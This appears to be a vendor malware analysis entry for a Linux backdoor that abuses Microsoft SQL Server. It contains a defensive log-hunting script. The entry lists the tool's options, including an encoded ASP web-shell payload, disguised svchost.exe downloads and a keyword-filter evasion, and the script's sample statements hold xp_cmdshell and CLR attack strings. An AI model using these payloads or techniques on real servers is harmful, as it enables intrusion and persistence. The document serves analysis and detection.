Backdoor.Linux.NOODLERAT.A

 Analysis by: Neljorn Nathaniel Aguas

 PLATFORM:

Linux

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Backdoor

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet, Dropped by other malware

This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

2,998,440 bytes

File Type:

ELF

Initial Samples Received Date:

23 Oct 2024

Arrival Details

This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Other Details

This Backdoor does the following:

  • It is used to interact with Microsoft SQL Server for command execution, file transfer, and assembly management.
  • It performs the following:
    • Executes commands via xp_cmdshell, sp_oacreate, and CLR assemblies.
    • Uploads and downloads files using OLE automation.
    • Creates and executes CLR assemblies within SQL Server.
    • Enables or disables xp_cmdshell and OLE automation procedures.
    • Lists running processes and performs network statistics checks.
    • Supports interactive and non-interactive modes.
    • Loads and executes shellcode on the target system.

It accepts the following parameters:

  • help, h → Shows a list of commands or help for one command
  • --server {value}, --host {value}, -s {value} → The database server (default: "127.0.0.1")
  • --user {value}, -u {value} → The database user (default: "sa")
  • --password {value}, -p {value} → The database password
  • --database {value}, -d {value} → The database name (default: "msdb")
  • --port {value}, -P {value} → The database port (default: 1433)
  • --option {value} → -xcmd, -X powershell (default: "whoami")
  • --query {value}, -q {value}, --sql {value} → SQL query (default: "select @@version")
  • --cmd {value}, -c {value}, --exec {value} → Exec System Command | xp_cmdshell command execution (default: "whoami")
  • --cmd1 {value}, --c1 {value} → Exec System Command | sp_oacreate execution without output (default: "whoami >C:\whoami.log")
  • --cmd2 {value}, --c2 {value} → Exec System Command | sp_oacreate execution with output | wscript.shell (default: "whoami")
  • --cmdsp {value} → Exec System Command | sp_oacreate execution with output | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")
  • --cmd3 {value}, --c3 {value} → Exec System Command | CLR execution | CLR command reference: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
  • --cmdpy {value} → Exec System Command | CLR execution | CLR command reference: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")
  • --cmd4 {value}, --c4 {value} → Exec System Command | custom CLR execution (default: "-c4 net -c5 user")
  • --cmd5 {value}, --c5 {value} → Exec System Command | custom CLR execution (default: "-c4 net -c5 user")
  • --cmd6 {value}, --c6 {value} → Exec System Command | xp_cmdshell command execution | statement submission method for when keywords such as xp_cmdshell are filtered (default: "-c6 whoami")
  • --cmd7 {value}, --c7 {value} → Exec System Command | custom CLR execution (default: "-c7 whoami")
  • --cmd8 {value}, --c8 {value} → Exec System Command | R language command (default: "-c8 whoami")
  • --cmd9 {value}, --c9 {value} → Exec System Command | Python language command (default: "-c9 whoami")
  • --cmd10 {value}, --c10 {value} → Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\windows\temp\123.txt")
  • --cmd11 {value}, --c11 {value} → Exec System Command | custom CLR execution | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")
  • --dir {value}, --dirtree {value} → xp_dirtree directory listing | dir c:
  • --path {value} → Website path, used as -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\inetpub\wwwroot\cmd.asp")
  • --local {value} → Local path localFile (default: "c:\1.txt")
  • --remote {value} → Remote path remoteFile (default: "C:\Windows\Temp\1.txt")
  • --code {value} → used as -path + -code | if the code contains " prefix it with \ to match <%eval request("cmd")%>; website path and ASP password default: LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")
  • --downurl {value} → URL of the file to download | http://www.microsoft.com/defender.exe
  • --filepath {value} → Path to save the downloaded file | c:\programdata\svchost.exe
  • --debug → Debug info
  • --enable, -e → Enable xp_cmdshell
  • --disable, --diclose → Disable xp_cmdshell
  • --ole, --oleopen → Enable sp_oacreate
  • --dole, --dolose → Disable sp_oacreate
  • --clr, --clropen → Enable "clr enabled"
  • --dclr, --dclose → Disable "clr enabled"
  • --rlce, --rlceopen → Enable R|Python language
  • --jobopen → Enable the MSSQL Agent Job service
  • --install_clr, --in_clr → install clr | --cmd3 "clr_exec whoami" | CLR command reference: https://github.com/uknowsec/SharpSQLTools/
  • --uninstall_clr, --un_clr → uninstall clr | --cmd3 "clr_exec whoami"
  • --installpy_clr, --inpy_clr → installpy clr | --cmdpy "clr_exec whoami" | CLR command reference: https://github.com/Ridter/PySQLTools
  • --uninstallpy_clr, --unpy_clr → uninstallpy clr | --cmdpy "clr_exec whoami"
  • --install_clrcmd, --in_clrcmd → install clrcmd | "--c4 net --c5 user"
  • --uninstall_clrcmd, --un_clrcmd → uninstall clrcmd | "--c4 net --c5 user"
  • --install_clrcmd1, --in_clrcmd1 → install clrcmd1 | --cmd7 "whoami"
  • --uninstall_clrcmd1, --un_clrcmd1 → uninstall clrcmd1 | --cmd7 "whoami"
  • --install_clrcmd2, --in_clrcmd2 → install clrcmd2 | --cmd11 "whoami"
  • --uninstall_clrcmd2, --un_clrcmd2 → uninstall clrcmd2 | --cmd11 "whoami"
  • --upload → --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe
  • --help, -h → show help
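The capabilities and command-line options listed above map onto a small set of server-side artifacts a defender can hunt for: every sp_configure change (xp_cmdshell, Ole Automation Procedures, clr enabled) is written to the SQL Server ERRORLOG with a fixed message, and the procedures the tool calls (xp_cmdshell, sp_oacreate, CREATE ASSEMBLY ... FROM 0x..., xp_dirtree) show up in captured statement text. The following Python script is an added example, not code from this page or from the tool it describes. It scans constructed ERRORLOG lines and constructed statement text and labels each hit with the option from the list above that would produce it. The log lines, statements, paths and assembly name are made up; the rule that flags dynamic SQL assembled from string fragments is an assumption about how --cmd6 evades keyword filtering, which the page does not spell out.

```python
"""Hunt for the MSSQL abuse pattern described above in SQL Server telemetry.

Added example, not code from the page or from the tool it describes. Inputs:
SQL Server ERRORLOG lines (sp_configure changes are logged there) and captured
statement text (e.g. from SQL Audit or an Extended Events session). All sample
data below is constructed for this example.
"""
import re
from dataclasses import dataclass

# ERRORLOG message written for every sp_configure change (real format).
CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")

# Server options the tool toggles. 'show advanced options' is a prerequisite
# for all of them but is too noisy on its own, so it is deliberately omitted.
DANGEROUS_OPTIONS = {
    "xp_cmdshell": "--enable / --disable",
    "Ole Automation Procedures": "--ole / --dole",
    "clr enabled": "--clr / --dclr",
    "external scripts enabled": "--rlce (R/Python)",
}

# Statement-text signatures. sp_oacreate accepts a CLSID in place of a ProgID,
# which is what --cmdsp relies on, so the WScript.Shell CLSID is matched too.
# The last rule is an assumption: the page says --cmd6 works around keyword
# filtering of xp_cmdshell but not how; splitting the keyword across string
# fragments, CHAR() or a hex literal inside EXEC() is the usual technique.
STATEMENT_RULES = [
    (re.compile(r"\bxp_cmdshell\b", re.I), "xp_cmdshell execution (--cmd)"),
    (re.compile(r"\bsp_oacreate\b", re.I), "OLE automation (--cmd1/--cmd2/--cmdsp, --upload)"),
    (re.compile(r"\bwscript\.shell\b|72C24DD5-D70A-438B-8A42-98424B88AFB8", re.I),
     "WScript.Shell via OLE (--cmd2/--cmdsp)"),
    (re.compile(r"\bCREATE\s+ASSEMBLY\b.*\bFROM\s+0x", re.I | re.S),
     "CLR assembly loaded from hex literal (--install_clr*)"),
    (re.compile(r"\bsp_execute_external_script\b", re.I), "R/Python execution (--cmd8/--cmd9)"),
    (re.compile(r"\bsp_(?:add|start)_job\b", re.I), "Agent job execution (--cmd10)"),
    (re.compile(r"\bxp_dirtree\b", re.I), "directory listing (--dir)"),
    (re.compile(r"\bEXEC(?:UTE)?\s*\(\s*(?:N?'[^']*'\s*\+|CHAR\s*\(|0x[0-9A-Fa-f]+)", re.I),
     "dynamic SQL from fragments/CHAR()/hex (assumed keyword-filter evasion, cf. --cmd6)"),
]


@dataclass(frozen=True)
class Finding:
    source: str       # "errorlog" or "statement"
    index: int        # 1-based line / statement number
    capability: str   # tool option the hit maps to
    excerpt: str


def scan_errorlog(lines):
    """Flag dangerous sp_configure changes. Disabling matters as much as
    enabling: the tool ships --disable/--dole/--dclr for cleanup."""
    out = []
    for i, line in enumerate(lines, 1):
        m = CONFIG_RE.search(line)
        if not m or m["opt"] not in DANGEROUS_OPTIONS:
            continue
        action = "enabled" if m["new"] != "0" else "disabled"
        out.append(Finding("errorlog", i,
                           f"{m['opt']} {action} ({DANGEROUS_OPTIONS[m['opt']]})", line.strip()))
    return out


def toggle_sequence(lines):
    """Ordered (option, action) flips; enable followed by disable in one
    session is the tool's enable-run-cleanup pattern."""
    seq = []
    for line in lines:
        m = CONFIG_RE.search(line)
        if m and m["opt"] in DANGEROUS_OPTIONS:
            seq.append((m["opt"], "enabled" if m["new"] != "0" else "disabled"))
    return seq


def scan_statements(statements):
    """Apply every signature to every statement; one Finding per rule hit."""
    out = []
    for i, stmt in enumerate(statements, 1):
        for rx, capability in STATEMENT_RULES:
            if rx.search(stmt):
                out.append(Finding("statement", i, capability, stmt[:70]))
    return out


# --- constructed sample telemetry (not real logs) ---------------------------
SAMPLE_ERRORLOG = [
    "2024-11-09 10:12:01.22 spid61      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-11-09 10:12:01.25 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-11-09 10:12:03.10 spid61      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-11-09 10:12:05.40 spid61      Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-11-09 10:15:00.00 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
    "2024-11-09 10:16:00.00 spid12      Log was backed up. Database: msdb, creation date(time): 2024/10/01(09:00:00)",
]

SAMPLE_STATEMENTS = [
    "SELECT @@version",
    "EXEC master..xp_cmdshell 'whoami'",
    r"DECLARE @s INT; EXEC sp_oacreate 'wscript.shell', @s OUTPUT; EXEC sp_oamethod @s, 'run', NULL, 'cmd /c whoami >C:\whoami.log'",
    "EXEC sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @s OUTPUT",
    "CREATE ASSEMBLY [SqlTools] FROM 0x4D5A90000300000004000000FFFF0000 WITH PERMISSION_SET = UNSAFE",
    "EXEC('xp_' + 'cmdshell ''whoami''')",
    r"EXEC master..xp_dirtree 'c:\', 1, 1",
    "SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG) + scan_statements(SAMPLE_STATEMENTS):
        print(f"{f.source}#{f.index}: {f.capability}\n    {f.excerpt}")
```

On a real host, feed the script the instance's ERRORLOG (default location under the instance's Log directory) and statement text from a SQL Audit or Extended Events capture of sql_batch_completed / rpc_completed. Two things in the sample output are worth keeping in mind when tuning: the xp_cmdshell option being enabled and then disabled by the same spid a few minutes later is a stronger signal than either event alone, and the split-keyword statement on line 6 produces no xp_cmdshell hit at all, which is exactly why a rule on dynamic SQL built from fragments is needed alongside the plain keyword rule.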

  SOLUTION

Minimum Scan Engine:

9.800

FIRST VSAPI PATTERN FILE:

19.704.05

FIRST VSAPI PATTERN DATE:

08 Nov 2024

VSAPI OPR PATTERN File:

19.705.00

VSAPI OPR PATTERN Date:

09 Nov 2024

Step 1

Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:

    • Troj.ELF.TRX.XXELFC1DFF045

Step 2

Scan your computer with your Trend Micro product to delete files detected as Backdoor.Linux.NOODLERAT.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the Trend Micro Support pages for more information.

